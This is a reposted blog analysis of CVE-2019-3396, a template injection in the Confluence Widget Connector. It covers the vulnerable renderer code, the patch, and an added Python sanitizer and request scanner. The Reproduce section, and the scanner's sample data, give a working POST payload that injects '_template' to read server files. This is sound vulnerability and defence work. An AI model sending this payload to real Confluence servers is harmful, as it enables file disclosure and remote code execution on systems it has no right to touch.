Nytro

【CVE-2019-3396】: SSTI and RCE in Confluence Server via Widget Connector


Published 2019-04-06 | Category: Web Security | Views: 1141

Twitter: chybeta

Security Advisory

https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html


Analysis

According to the documentation, there are three parameters that can be set to control the content or format of the macro output: URL, Width and Height.


The Widget Connector defines a number of renderers. For example, the FriendFeedRenderer:

public class FriendFeedRenderer implements WidgetRenderer
{
    ...

    public String getEmbeddedHtml(String url, Map<String, String> params) {
        // This renderer sets the Velocity template itself before rendering,
        // so a caller-supplied "_template" entry is overwritten here.
        params.put("_template", "com/atlassian/confluence/extra/widgetconnector/templates/simplejscript.vm");
        return this.velocityRenderService.render(getEmbedUrl(url), params);
    }
}

In FriendFeedRenderer's getEmbeddedHtml function, you can see that the renderer itself puts an additional option, _template, into the params map.

However, some other renderers, such as those in the video category, just call render(getEmbedUrl(url), params) directly, without setting _template themselves.

So in this situation we can "offer" the _template value ourselves, because the backend passes the request parameters straight through to the renderer and uses whatever _template it finds there.


Reproduce

POST /rest/tinymce/1/macro/preview HTTP/1.1

{"contentId":"65601","macro":{"name":"widget","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"../web.xml"},"body":""}}


Patch

In the fixed version, doSanitizeParameters is called before the HTML is rendered; it removes _template from the parameters. The code looks like this:

public class WidgetMacro
    extends BaseMacro
    implements Macro, EditorImagePlaceholder
{
    public WidgetMacro(RenderManager renderManager, LocaleManager localeManager, I18NBeanFactory i18NBeanFactory)
    {
        ...
        // Parameter names that must never come from the request
        this.sanitizeFields = Collections.unmodifiableList(Arrays.asList(new String[] { "_template" }));
    }

    ...

    public String execute(Map<String, String> parameters, String body, ConversionContext conversionContext) {
        ...
        // Strip caller-controlled internal options before they reach the renderer
        doSanitizeParameters(parameters);

        return this.renderManager.getEmbeddedHtml(url, parameters);
    }

    private void doSanitizeParameters(Map<String, String> parameters)
    {
        Objects.requireNonNull(parameters);
        for (String sanitizedParameter : this.sanitizeFields) {
            parameters.remove(sanitizedParameter);
        }
    }
}
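To make the root cause and the fix concrete from a defender's side, here is an added example that is not part of chybeta's post or of Atlassian's code. It models the macro parameter handling in Python: a denylist sanitizer equivalent to the patched doSanitizeParameters, a stricter allowlist variant that keeps only the documented url/width/height parameters, and a small detection routine that scans JSON bodies posted to the /rest/tinymce/1/macro/preview endpoint and flags widget macro requests carrying parameters outside that documented set. The function names and the sample request bodies are constructed for this illustration.

```python
import json

# Parameters the Widget Connector macro is documented to accept (URL, Width,
# Height in the analysis above). Anything else arriving from a client is unexpected.
ALLOWED_WIDGET_PARAMS = frozenset({"url", "width", "height"})

# Fields the fixed WidgetMacro strips before rendering (the sanitizeFields list in the patch).
SANITIZE_FIELDS = ("_template",)


def sanitize_widget_params(params):
    """Denylist sanitizer, equivalent to the patched doSanitizeParameters: drop _template."""
    cleaned = dict(params)
    for field in SANITIZE_FIELDS:
        cleaned.pop(field, None)
    return cleaned


def allowlist_widget_params(params):
    """Stricter variant: keep only the documented macro parameters, so no other
    internal option a renderer might read from the map can be injected either."""
    return {key: value for key, value in params.items() if key in ALLOWED_WIDGET_PARAMS}


def widget_params_from_body(raw):
    """Return the params map of a widget macro preview body, or None if the body
    is not JSON or is not a widget macro request."""
    try:
        doc = json.loads(raw)
    except json.JSONDecodeError:
        return None
    macro = doc.get("macro") or {}
    if macro.get("name") != "widget":
        return None
    return macro.get("params") or {}


def find_suspicious_macro_requests(bodies):
    """Scan JSON bodies posted to /rest/tinymce/1/macro/preview and report widget
    macro requests that carry parameters outside the documented set."""
    findings = []
    for index, raw in enumerate(bodies):
        params = widget_params_from_body(raw)
        if params is None:
            continue
        unexpected = sorted(set(params) - ALLOWED_WIDGET_PARAMS)
        if unexpected:
            findings.append({
                "index": index,
                "unexpected_params": unexpected,
                "template": params.get("_template"),
            })
    return findings


# Constructed sample bodies (not captured traffic): a benign preview request, the
# request shape shown in the Reproduce section above, and an unrelated macro.
SAMPLE_BODIES = [
    '{"contentId":"65601","macro":{"name":"widget","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000"},"body":""}}',
    '{"contentId":"65601","macro":{"name":"widget","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"../web.xml"},"body":""}}',
    '{"contentId":"65601","macro":{"name":"code","params":{"language":"java"},"body":"int x;"}}',
]

if __name__ == "__main__":
    for finding in find_suspicious_macro_requests(SAMPLE_BODIES):
        print(f"request #{finding['index']}: unexpected params {finding['unexpected_params']}, "
              f"_template={finding['template']!r}")
    tainted = widget_params_from_body(SAMPLE_BODIES[1])
    print("after sanitize:", sanitize_widget_params(tainted))
    print("after allowlist:", allowlist_widget_params(tainted))
```

The denylist mirrors what the patch does and is enough for this CVE; the allowlist is the design a reviewer would prefer, since it closes the same class of bug for any other map entry a renderer might consult. The scanner is the kind of check to run over request logs or a WAF rule set: on the samples it reports only the second body, with _template as the unexpected parameter.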


Source: https://chybeta.github.io/2019/04/06/Analysis-for-【CVE-2019-3396】-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/
